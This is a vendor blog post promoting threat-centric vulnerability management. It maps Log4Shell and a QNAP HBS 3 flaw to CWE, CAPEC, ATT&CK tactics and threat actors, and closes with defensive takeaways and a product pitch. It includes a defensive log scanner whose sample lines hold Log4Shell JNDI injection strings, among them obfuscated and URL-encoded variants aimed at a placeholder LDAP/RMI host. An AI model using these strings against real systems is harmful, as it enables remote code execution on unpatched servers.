If there’s one thing we’ve learned over the years in cybersecurity, it’s that vulnerabilities have a nasty habit of reappearing in different forms. To handle those vulnerabilities effectively, I’m introducing here a threat-centric approach to vulnerability management, leveraging Phoenix Security ASPM threat intelligence. Some days, it’s like playing whack-a-mole with the Common Vulnerabilities and Exposures (CVE) database—except the moles can ransom your entire network. This blog explores how focusing on threat categories rather than singular vulnerabilities can help reduce exhaustion (and maybe your coffee consumption) while strengthening your security posture for your Application Security and Unified Vulnerability Management Program.
We’ll review how CVE, CWE, CAPEC, and MITRE ATT&CK relate. Then, we’ll examine two prime examples—CVE-2021-44228 (the infamous Log4Shell) and CVE-2021-28799 (the QNAP HBS 3 vulnerability)—to illustrate how a threat-centric approach can pay dividends in the long run.
Check Out the full video: https://youtu.be/kMM6vTRVd9s
To see all the analysis used here, access the threat-centric analyzer: https://threat-centric.phoenix.security
Part 1: Understanding the Mapping – CVE, CWE, CAPEC, and MITRE
In the vulnerability world, acronyms are almost as common as phishing emails. Here’s a quick breakdown:
1. CVE (Common Vulnerabilities and Exposures)
• A CVE is a standardized identifier for a specific vulnerability.
• Example: CVE-2021-44228 for Log4j’s remote code execution flaw.
2. CWE (Common Weakness Enumeration)
• CWE describes the underlying software weakness that leads to the vulnerability.
• For CVE-2021-44228, multiple CWEs apply, such as Improper Access Control or Improper Input Validation.
3. CAPEC (Common Attack Pattern Enumeration and Classification)
• CAPEC focuses on the attacker’s perspective: how they might exploit the weakness.
• For instance, CAPEC references attack patterns like Injection, Exploitation of Remote Code Execution, and Bypass Techniques.
4. MITRE ATT&CK
• A framework describing how adversaries move through the kill chain—covering Tactics, Techniques, and Procedures (TTPs).
• In the case of Log4Shell, numerous APT group campaigns highlight Defense Evasion, Privilege Escalation, and Persistence.
Aligning a CVE to its corresponding CWE, CAPEC patterns, and MITRE techniques gives a holistic view of the problem, how attackers exploit it, and where it fits in the overall attack kill chain. This helps shape more effective, layered defenses. It matters if you want to leverage threat intelligence for vulnerability management beyond simply mapping that intelligence to a CVE. The same mapping can also be used to infer which threat actors could plausibly exploit a given vulnerability.
The next evolution of your vulnerability management program involves treating threats as central parts of vulnerability analysis and evolving application security programs.
Part 2: The Problem with One-Off Patch Management
Let’s face it: organizations often scramble when a critical CVE pops up. Everyone goes on high alert, coffee machines go into overdrive, and scanners churn out massive reports. Then, after the patch-a-thon, everyone breathes a sigh of relief—until the next significant vulnerability emerges.
Exhaustion and the Never-Ending Game of Patch-and-Pray
• Time-Consuming: Security teams spend a disproportionate time firefighting each major CVE.
• Resource-Draining: Constant emergency patching distracts from more significant initiatives like strategic improvements or advanced monitoring.
• Inefficient: Focusing on one CVE at a time may blind you to the broader category of unaddressed weaknesses.
Enter the threat-centric approach. Instead of chasing your tail each time a new vulnerability surfaces, you identify and tackle the categories of weaknesses—like Remote Code Execution or Improper Authorization—that attackers repeatedly exploit for both your Application Security and Unified Vulnerability Management Program.
Part 3: Two Real-World Examples of vulnerabilities used in ransomware
Using a threat-centric approach to analyze CVE-2021-44228 (Log4J)
3.1 CVE-2021-44228 (Log4J)
Using our LLM Analyzer, we get the following:
[VENDOR] Apache
[PRODUCT] Log4j2
[COMPONENT] 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1)
[VERSION]
[WEAKNESS] Improper access control
[ATTACKER] attacker
[IMPACT] execute arbitrary code
[VECTOR] control log messages or log message parameters
[ROOTCAUSE] Unprotected JNDI features
[VULNERABILITY TYPE] Improper access control
[VULNERABILITY IMPACT] Code execution
What you could communicate using the threat analysis above:
• Vendor/Product: Apache Log4j2
• Weakness (CWE): Improper Access Control, among others
• Impact: Remote Code Execution (RCE)
• Root Cause: Unprotected JNDI features that allow attackers to load malicious code from LDAP servers
• Affected Versions: 2.0-beta9 through 2.15.0 (excluding certain security releases)
Why It’s So Dangerous
Log4Shell lets attackers execute arbitrary code if they can control log messages. This vulnerability became a favorite among ransomware operators. According to some data from Phoenix Security threat intel on ransomware, Log4Shell has been identified in multiple attack campaigns aiming to:
• Inject malicious payloads
• Escalate privileges
• Persist on the victim’s network (while evading defenses)
These patterns align with the MITRE ATT&CK categories for Defense Evasion, Persistence, and Privilege Escalation. In other words, once the attacker gets a foothold, they can roam freely—and possibly hold your data hostage faster than you can say “Java meltdown.”
What Threat Actors Are Using Log4j?
Various APT groups and cybercriminal organizations have leveraged the Log4Shell vulnerability for different motivations—ranging from espionage to financial gain. According to some of the threat mappings, groups like BlackOasis, APT37 (Reaper), Evilnum, CopyKittens, APT38, and Rocke have been tied to tactics that can include Log4j exploits or similar remote code execution techniques. Many ransomware gangs have also exploited this vulnerability to establish initial access, move laterally, and eventually encrypt valuable data.
• BlackOasis: Focuses on espionage, targeting media and think tanks.
• APT37 (Reaper, ScarCruft): Based in North Korea, motivated by information theft.
• Evilnum: Known for financial sector espionage.
• CopyKittens: Iranian-linked group focusing on government and IT sectors.
• APT38 (Bluenoroff): Known for financial crimes, often linked to the DPRK.
• Rocke: Chinese-based cybercriminal group motivated by financial gain.
In all these cases, Remote Code Execution is the golden ticket, enabling Defense Evasion, Privilege Escalation, and Persistence tactics per the MITRE ATT&CK framework.
Phoenix Security ASPM Threat Centric Approach – Threat Actors leveraging CVE-2021-44228 (Log4J) to deliver ransomware attacks
Takeaways based on this threat analysis using a threat-centric approach.
The recommendation you could make to a team based on this analysis is:
1. Patch Immediately: Update Log4j to 2.16.0 (or a later security release).
2. Restrict JNDI: Even if you’ve patched, consider restricting or disabling JNDI lookups since they’re a standard route for exploitation.
3. Monitor for Suspicious Traffic: Watch network calls to unexpected LDAP or JNDI-related endpoints.
4. Remote code execution is one of the easiest vulnerability classes to exploit and the one most prolifically used in zero-days and by threat actors delivering ransomware.
5. Since this is a highly targeted vulnerability with wide adoption and exploitation, it is key to schedule a campaign and monitor the remediation of this vulnerability at scale. Check the Phoenix Security vulnerability campaign feature.
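The third takeaway, watching for JNDI lookup traffic, is easy to get wrong because the lookup string that triggers Log4Shell is rarely sent in its plain form. The following is an added example (not Phoenix Security or Apache code) that scans web-server access log lines for JNDI lookups, first URL-decoding and then collapsing the nested lookup forms named in public Log4Shell detection guidance (`${lower:x}`, `${upper:x}` and `${key:-default}`) so that split or encoded variants normalise to a literal `${jndi:` before matching. The log lines are constructed sample data, and 198.51.100.7 is a documentation address, not a real host.

```python
"""Flag log lines that carry a JNDI lookup string (the Log4Shell trigger).

Added illustration, not Phoenix Security or Apache code. The log lines are
constructed; the host 198.51.100.7 is a documentation address. The nested
lookup forms resolved here (${lower:x}, ${upper:x}, ${key:-default}) are the
ones named in public Log4Shell detection guidance.
"""
import re
from urllib.parse import unquote

# An innermost ${...} lookup, i.e. one with no further ${ } nested inside it.
_INNER = re.compile(r"\$\{([^${}]*)\}")
# After normalisation the trigger is a literal ${jndi: lookup.
_JNDI = re.compile(r"\$\{jndi:", re.IGNORECASE)


def _resolve_inner(expr: str) -> str:
    """Resolve one innermost lookup the way Log4j would for the forms used to
    split the word 'jndi'; any other lookup is left exactly as it was."""
    key, sep, rest = expr.partition(":")
    if sep and key.lower() == "lower":
        return rest.lower()
    if sep and key.lower() == "upper":
        return rest.upper()
    if ":-" in expr:                      # ${::-j} or ${env:NOPE:-j} -> default value
        return expr.split(":-", 1)[1]
    return "${" + expr + "}"              # unknown lookup: keep it literally


def normalize(line: str, max_rounds: int = 10) -> str:
    """URL-decode, then repeatedly collapse innermost lookups until nothing changes."""
    line = unquote(line)
    for _ in range(max_rounds):
        new = _INNER.sub(lambda m: _resolve_inner(m.group(1)), line)
        if new == line:
            break
        line = new
    return line


def is_jndi_lookup(line: str) -> bool:
    """True when the normalised line contains a JNDI lookup."""
    return _JNDI.search(normalize(line)) is not None


def scan(lines):
    """Return (1-based line number, normalised line) for every flagged line."""
    return [(i, normalize(ln)) for i, ln in enumerate(lines, 1) if is_jndi_lookup(ln)]


# Constructed web access log: one plain JNDI string, two nested/obfuscated
# variants, one URL-encoded variant, and two benign lines.
LOG_LINES = [
    '10.0.0.5 - - "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${${lower:j}ndi:${lower:l}dap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:rmi://198.51.100.7:1099/a}"',
    '10.0.0.9 - - "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F198.51.100.7%2Fa%7D HTTP/1.1" 404 "curl/7.88"',
    '10.0.0.3 - - "GET /status HTTP/1.1" 200 "${date:yyyy-MM-dd} healthcheck"',
]

if __name__ == "__main__":
    for lineno, normalised in scan(LOG_LINES):
        print(f"line {lineno}: {normalised}")
```

Run as a script, it reports lines 2 to 5 and leaves the `${date:...}` healthcheck alone, because only lookups that collapse to `${jndi:` are flagged. The normalisation step is the part worth keeping: a rule that matches the literal `${jndi:` misses every split variant. Detection of this kind complements patching rather than replacing it; Apache’s own guidance is to upgrade rather than rely on the older lookup-disabling mitigations.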
You can also bring reachability analysis and visibility/business criticality into the narrative to refine what is actually exploitable: network reachability and library reachability at runtime raise or lower the likelihood of exploitation. Check out the latest topics on reachability from our previous blog and the recent announcement on AI-based contextual runtime reachability.
QNAP CVE-2021-28799 (QNAP HBS 3)
3.2 CVE-2021-28799 (QNAP HBS 3)
To analyze this vulnerability, we used the threat-centric LLM agent, which gives the following:
[VENDOR] QNAP
[PRODUCT] HBS 3
[COMPONENT]
[VERSION] prior to v16.0.0415 on QTS 4.5.2, prior to v3.0.210412 on QTS 4.3.6, prior to v3.0.210411 on QTS 4.3.4, prior to v3.0.210411 on QTS 4.3.3, prior to v16.0.0419 on QuTS hero h4.5.1, prior to v16.0.0419 on QuTScloud c4.5.1~c4.5.4
[WEAKNESS] Improper authorization
[ATTACKER] Remote attackers
[IMPACT] Log in to a device
[VECTOR]
[ROOTCAUSE]
[VULNERABILITY TYPE] Improper authorization
[VULNERABILITY IMPACT] Unauthorized login
What you could communicate using the threat analysis above:
• Vendor/Product: QNAP NAS devices running HBS 3 (Hybrid Backup Sync)
• Weakness (CWE): Improper Authorization
• Impact: Allows remote attackers to log in to the device without proper authorization
• Affected Versions: Multiple QTS and QuTS hero versions before specific patch releases
What Threat Actors Are Using QNAP CVE-2021-28799?
QNAP network storage solutions have attracted attention from a range of ransomware operators and opportunistic threat actors due to their popularity and the valuable data they often store. While not always tied to high-profile APT groups, QNAP devices have been targeted by:
1. eCh0raix (QNAPCrypt) Ransomware: Specializes in encrypting files on QNAP devices.
2. QSnatch Malware: Focuses on credential harvesting and establishing backdoors.
3. Multifaceted Ransomware Gangs: Various ransomware-as-a-service (RaaS) outfits may incorporate QNAP exploits or vulnerabilities like CVE-2021-28799 in their initial access chain.
These actors capitalize on Improper Authorization flaws to log in without proper credentials, then often escalate privileges or encrypt backups—an especially painful scenario if the QNAP is your primary backup target.
Why It Matters
Ransomware operators love a good unauthorized login. Once inside, they can:
• Exfiltrate sensitive data from the NAS before encrypting it.
• Move laterally within your network to compromise additional targets.
• Rely on unauthorized logins and remote code execution, two of the techniques most frequently used in ransomware attacks and exploitation.
• Target QNAP network storage, which organizations use to hold backups: threat actors use this vulnerability for exfiltration, for preventing backup restoration after ransomware, or simply for data hijacking.
Even though the root cause is different (i.e., “improper authorization” vs. “improper access control”), the outcome is strikingly similar: unauthorized remote control of systems. Once an attacker can log in, they essentially have the keys to the kingdom.
Takeaways
1. Enforce Strong Authentication: Beyond patching, make sure multi-factor authentication (MFA) is enabled where possible.
2. Segment Your Network: Don’t let one compromised NAS device lead to your entire environment being ransomed.
3. Regularly Audit Credentials: Attackers often reuse stolen credentials across multiple devices.
4. Consider the Threat: Look at the specific threat, the threat actors leveraging this type of vulnerability, and the techniques they use.
5. Assess Reachability: Check whether the system is reachable from the network, and whether compensating controls such as a WAF or network segmentation raise or lower the likelihood of those attacks.
6. Run a Campaign: Since this is a highly targeted vulnerability with wide adoption and exploitation, schedule a campaign and monitor the remediation of this vulnerability at scale. Check the Phoenix Security vulnerability campaign feature.
The information in this article is also available in greater detail in the eBook Building Resilient Application Security and Cloud Security Programs.
Part 4: A Threat-Centric Approach to Vulnerability management and crossing ASPM boundaries
Now, you can take both these problems together; they have common characteristics: both belong to the Remote Code Execution class and both allow second-stage attacks.
QNAP: Remote Code Execution and Information Leak | Improper Authorization
Log4j: Remote Code Execution | Modify Configuration
Instead of seeing Log4Shell and QNAP as isolated nightmares, view them as part of broader categories:
• Remote Code Execution (RCE): Tackle the root causes, such as injection flaws (SQL, LDAP, or JNDI) and inadequate input validation.
• Improper Authorization: Verify that your applications enforce strict role-based access and multi-factor authentication.
Looking at the patterns most frequently exploited in vulnerabilities used in ransomware, we see these same two patterns.
Analyzing zero-days and ransomware attacks over the years also shows a strong resemblance in the vulnerability methods used as root cause and technical impact.
Benefits of Category-Focused Strategies
1. Proactive Defense
By identifying recurring patterns—like RCE or authentication bypass—you can harden your systems before the next significant vulnerability appears.
2. Reduced False Sense of Security
Once you patch a single CVE, it’s tempting to say “We’re good!” But you remain vulnerable to the next variant if you haven’t addressed the underlying CWE (e.g., remote code execution, memory corruption, improper input handling).
3. Efficient Use of Resources
Rather than chasing each new CVE, direct your patching and remediation efforts toward the classes of problems with the highest risk.
4. Threat-Focused Campaigns
Rather than addressing each vulnerability individually, focusing on the threats that cause the most harm, such as remote code execution and buffer overflow or memory corruption, helps an organization efficiently reduce future exposure to exploitation and act on known threat-actor methods. Check the Phoenix Security vulnerability campaign feature.
Part 5: Mapping It All Together
Below is a simplified illustration of how these two CVEs map to broader attack patterns. Notice the recurring themes:
1. CVE → CWE
• CVE-2021-44228 → Improper Access Control and Improper Input Validation (among others)
• CVE-2021-28799 → Improper Authorization
2. CWE → CAPEC
• Log4Shell: RCE via malicious JNDI injection (CAPEC references to injection and code execution techniques)
• QNAP HBS 3: Authentication bypass (CAPEC references for Bypass or Evasion patterns)
3. MITRE ATT&CK Techniques
• Log4Shell: Tactics such as Defense Evasion, Privilege Escalation, Persistence
• QNAP: Initial Access leading to further infiltration
4. Threat Actors
• Ransomware groups and APTs often reuse the same tactics (e.g., RCE) in different campaigns. By plugging the category-level holes, you reduce your attack surface across the board.
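To make the Part 4 and Part 5 idea concrete, here is an added example (not Phoenix Security code) of what a category-level view looks like in code: each finding carries the CVE → CWE mapping, the technical impact from the analyzer output, the ATT&CK tactics seen in campaigns that used the CVE, and two threat-intel flags (ransomware use, network reachability). Findings are then grouped into one remediation campaign per threat category instead of one per CVE, and the categories are ranked. The findings are constructed sample data; the CWE IDs (CWE-284 Improper Access Control, CWE-20 Improper Input Validation, CWE-285 Improper Authorization) and tactic IDs (TA0001, TA0003, TA0004, TA0005) are the standard IDs for the names the article uses, and the scoring weights are an assumption, not Phoenix’s risk formula.

```python
"""Threat-centric grouping of findings into category-level remediation campaigns.

Added illustration, not Phoenix Security code. The findings are constructed
sample data; the CWE and ATT&CK tactic IDs are the standard IDs for the
weakness and tactic names the article uses; the scoring weights are assumed.
"""
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    cve: str
    asset: str
    cwes: tuple              # CWE IDs behind the CVE (the CVE -> CWE step)
    impact: str              # technical impact as the analyzer labels it
    tactics: tuple           # ATT&CK tactic IDs seen in campaigns using the CVE
    ransomware_use: bool     # exploited in ransomware campaigns per threat intel
    network_reachable: bool  # asset sits on a network-reachable path


# Technical impact -> threat category tracked by the programme (the article's two classes).
CATEGORY_BY_IMPACT = {
    "Code execution": "Remote Code Execution",
    "Unauthorized login": "Improper Authorization",
}

# Constructed sample inventory: two app hosts with Log4Shell, one NAS with the QNAP flaw.
# CWE-284 Improper Access Control, CWE-20 Improper Input Validation, CWE-285 Improper Authorization.
# TA0001 Initial Access, TA0003 Persistence, TA0004 Privilege Escalation, TA0005 Defense Evasion.
FINDINGS = [
    Finding("CVE-2021-44228", "app-01", ("CWE-284", "CWE-20"), "Code execution",
            ("TA0005", "TA0004", "TA0003"), True, True),
    Finding("CVE-2021-44228", "app-02", ("CWE-284", "CWE-20"), "Code execution",
            ("TA0005", "TA0004", "TA0003"), True, False),
    Finding("CVE-2021-28799", "nas-backup-01", ("CWE-285",), "Unauthorized login",
            ("TA0001",), True, True),
]


def category_of(finding: Finding) -> str:
    """Map a finding to its threat category via its technical impact."""
    return CATEGORY_BY_IMPACT.get(finding.impact, "Other")


def score(finding: Finding) -> int:
    """Assumed additive weighting: base 1, +2 if ransomware actors use the CVE,
    +1 if the asset is network reachable (reachability raises likelihood)."""
    return 1 + (2 if finding.ransomware_use else 0) + (1 if finding.network_reachable else 0)


def build_campaigns(findings):
    """Group findings by category and rank the categories for remediation campaigns.

    Returns a list of dicts (highest total score first) holding the category,
    its distinct CVEs, affected assets, the union of CWEs and ATT&CK tactics,
    and the total score, so that one campaign covers a whole weakness class.
    """
    groups = defaultdict(lambda: {"cves": set(), "assets": set(),
                                  "cwes": set(), "tactics": set(), "score": 0})
    for f in findings:
        g = groups[category_of(f)]
        g["cves"].add(f.cve)
        g["assets"].add(f.asset)
        g["cwes"].update(f.cwes)
        g["tactics"].update(f.tactics)
        g["score"] += score(f)
    campaigns = []
    for category, g in groups.items():
        campaigns.append({
            "category": category,
            "cves": sorted(g["cves"]),
            "assets": sorted(g["assets"]),
            "cwes": sorted(g["cwes"]),
            "tactics": sorted(g["tactics"]),
            "score": g["score"],
        })
    return sorted(campaigns, key=lambda c: (-c["score"], c["category"]))


if __name__ == "__main__":
    for c in build_campaigns(FINDINGS):
        print(f"{c['category']}: score={c['score']} cves={c['cves']} "
              f"assets={c['assets']} cwes={c['cwes']} tactics={c['tactics']}")
```

On the sample data the Remote Code Execution campaign ranks first (two assets, both tied to ransomware use) and carries the union of the tactics seen for Log4Shell, while the Improper Authorization campaign collects the NAS finding under Initial Access. The useful property is that a new CVE with the same technical impact lands in an existing campaign rather than starting a fresh fire drill; the real inputs (threat-intel flags, reachability, the weighting) would come from your ASPM data, not from the constants here.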
Part 6: Final Thoughts (and a Sip of Sanity)
A threat-centric approach may sound like another buzzword—and fair enough, cybersecurity does love its buzzwords. But if you look beyond the hype, you’ll see a methodology that reduces the constant whack-a-mole effect. By aligning your defenses with the recurring weaknesses (CWEs) and attack patterns (CAPEC, MITRE ATT&CK), you build resilience that doesn’t crumble the moment a new exploit hits Twitter.
Combining this threat-centric approach also makes it possible to anticipate future attacks: by starting from those threats, we can identify common characteristics (CWE, CAPEC) in software and other vulnerabilities that threat actors will leverage in future vulnerability types to deliver zero-days or ransomware attacks.
Those techniques can also be combined with code reachability analysis, network reachability analysis, and code-to-container reachability analysis to deliver a unified approach to vulnerabilities from code to cloud.
So before you roll out of bed at 3 a.m. to handle the next zero-day crisis—and you probably will—make sure you’re investing in eliminating entire classes of weaknesses. That way, your coffee supply might last a little longer. And who knows? Maybe you’ll get to enjoy a full night’s sleep before the next big vulnerability lands on the front page of every security news site.
Resources & Further Reading
1. Phoenix Security Threat Intel – For up-to-date data on ransomware TTPs and exploit prevalence.
- Exploit in the wild: https://phoenix.security/what-is-exploitability/
- OWASP/Appsec Vulnerability: https://phoenix.security/what-is-owasp-main/
- CWE/Appsec Vulnerabilities: https://phoenix.security/what-is-cwe-main/
2. MITRE ATT&CK – A wealth of information on adversarial behavior.
3. CVE Details – Keep an eye on the official CVE database for new disclosures.
4. Apache Log4j Security Page – For official patches and best practices on Log4Shell.
5. QNAP Security Advisories – For updates on QNAP product patches and vulnerabilities.
Stay safe, stay curious, and remember: categorizing your vulnerabilities is like categorizing your socks—if you don’t do it, you’ll always end up with a mismatched pair at the worst possible time.
Minimize the vulnerability risk and act on the vulnerabilities that matter most, combining ASPM, EPSS, and reachability analysis.
Organizations often face an overwhelming volume of security alerts, including false positives and duplicate vulnerabilities, which can distract from real threats. Traditional tools may overwhelm engineers with lengthy, misaligned lists that fail to reflect business objectives or the risk tolerance of product owners.
Phoenix Security offers a transformative solution through its Actionable Application Security Posture Management (ASPM), powered by AI-based Contextual Quantitative analysis. This innovative approach correlates runtime data, combines it with EPSS and other threat intelligence, and applies the right risk to code and cloud, delivering a prioritized list of vulnerabilities.
Why do people talk about Phoenix Security ASPM?
• Automated Triage: Phoenix streamlines the triage process using a customizable 4D risk formula, ensuring critical vulnerabilities are addressed promptly by the right teams.
• Actionable Threat Intelligence: Phoenix provides real-time insights into vulnerabilities’ exploitability, leveraging EPSS and combining runtime threat intelligence with application security data for precise risk mitigation.
• Contextual Deduplication with reachability analysis: Utilizing canary token-based traceability for network reachability and static and dynamic runtime reachability, Phoenix accurately deduplicates and tracks vulnerabilities within application code and deployment environments, allowing teams to concentrate on genuine threats.
By leveraging Phoenix Security, you not only unravel the potential threats but also take a significant stride in vulnerability management, ensuring your application security remains current and focuses on the key vulnerabilities.